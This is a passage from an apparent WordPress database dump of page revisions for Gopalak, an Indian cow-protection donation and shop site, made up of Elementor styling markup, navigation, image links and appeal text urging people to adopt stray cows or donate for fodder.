svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 10:39:57','2022-10-28 05:09:57','',1816,'https://gopalak.in/?p=2005',0,'revision','',0),(2006,1,'2022-10-28 10:39:57','2022-10-28 05:09:57','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 10:39:57','2022-10-28 05:09:57','',1816,'https://gopalak.in/?p=2006',0,'revision','',0),(2007,1,'2022-10-28 11:13:23','2022-10-28 05:43:23','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-ic